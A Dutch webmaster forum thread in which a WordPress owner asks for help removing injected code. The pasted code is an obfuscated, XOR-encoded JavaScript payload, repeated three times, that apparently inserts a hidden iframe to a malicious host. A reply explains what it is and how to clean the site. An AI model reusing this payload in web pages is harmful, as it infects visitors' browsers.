Op een wordpress website krijg ik in Google Chrome een Malware waarschuwing. Op de server stonden idd vreemde bestanden. Ik heb ze verwijderd en paswoorden veranderd. Nu als ik paginabron bekijken doe, staat er helemaal onderaan dit:
</body></html><script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82 ,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86, 90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67 ,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,8 2,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,1 0,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,6 7,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89, 82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,11 4,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,8 2,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82 ,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jn yh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script><script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82 ,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86, 90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67 ,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,8 2,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,1 0,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,6 7,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89, 82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,11 4,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,8 2,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82 ,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jn yh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script>lo=new Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82 ,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86, 90,82,16,30,12,61,81,69,25,68,69,84,10,21,95,67,67 ,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,8 2,67,24,81,86,69,24,68,95,88,64,25,71,95,71,8,68,1 0,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,6 7,78,91,82,25,83,94,68,71,91,86,78,10,21,89,88,89, 82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,11 4,91,82,90,82,89,67,68,117,78,99,86,80,121,86,90,8 2,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82 ,89,83,116,95,94,91,83,31,81,69,30,12,61);oa="";jn yh=String.fromCharCode;tl=55;for(vf in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</script>
Iemand enig idee hoe ik dit wegkrijg? Of waar dit zich ergens kan bevinden?
Aanvullend bericht:
Blijkbaar zit er ergens een iframe dat verwijst naar adcounters.net ... kan het alleen niet vinden!
- Malware?
-
13-01-2010, 13:33 #1
- Berichten
- 1.054
- Lid sinds
- 18 Jaar
Malware?
Laatst aangepast door Kim P. : 13-01-2010 om 13:38 Reden: Automatisch samengevoegd.
-
In de schijnwerper
Zeer ervaren programmeur beschikbaar | web, api & appFreelance / WerkSpraakcomputers.nl - Premium domeinnaam - Medisch / communicatiemiddelenDomein te koopProduct feed grid V1.7 - Creer een affiliate shop in 2 min - WP plugin - V1.7 NU LIVEPHP scriptsAffiliate link poster V1.0 - Automatisch affiliate links posten in blogs - WP pluginPHP scripts -
13-01-2010, 13:47 #2
- Berichten
- 1.660
- Lid sinds
- 18 Jaar
Dat is een gecodeerde iframe. Dit code moet je verwijderen. Vaak bevinden dit soort iframes in index bestanden en .js bestanden. Kennelijk omdat er toegang is verschaft tot je FTP account. Dus je wachtwoorden veranderen is zeker aanbevolen en controleer je computer op infecties.
Dit soort aanvallen gebeuren erg vaak
Plaats een
- + Advertentie
- + Onderwerp
Marktplaats
Webmasterforum
- Websites algemeen
- Sitechecks
- Marketing
- Domeinen algemeen
- Waardebepaling
- CMS
- Wordpress
- Joomla
- Magento
- Google algemeen
- SEO
- Analytics
- Adsense
- Adwords
- HTML / XHTML
- CSS
- Programmeren
- PHP
- Javascript
- JQuery
- MySQL
- Ondernemen algemeen
- Belastingen
- Juridisch
- Grafisch ontwerp
- Hosting Algemeen
- Hardware Info
- Offtopic